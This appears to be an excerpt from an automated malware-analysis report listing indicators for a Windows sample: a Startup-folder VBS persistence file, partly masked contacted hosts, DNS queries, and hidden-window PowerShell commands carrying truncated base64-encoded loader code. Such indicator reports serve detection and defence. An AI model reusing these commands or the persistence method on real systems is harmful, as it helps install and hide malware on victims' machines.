Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\netframwork4.2.vbs
- 'on####ve.live.com':443
- 'k7####.#n.files.1drv.com':443
- 'ia#####3.us.archive.org':443
- 'up####.myiphost.com':1919
- 'microsoft.com':80
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK on####ve.live.com
- DNS ASK k7####.#n.files.1drv.com
- DNS ASK ia#####3.us.archive.org
- DNS ASK up####.myiphost.com
- DNS ASK microsoft.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhA...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhA...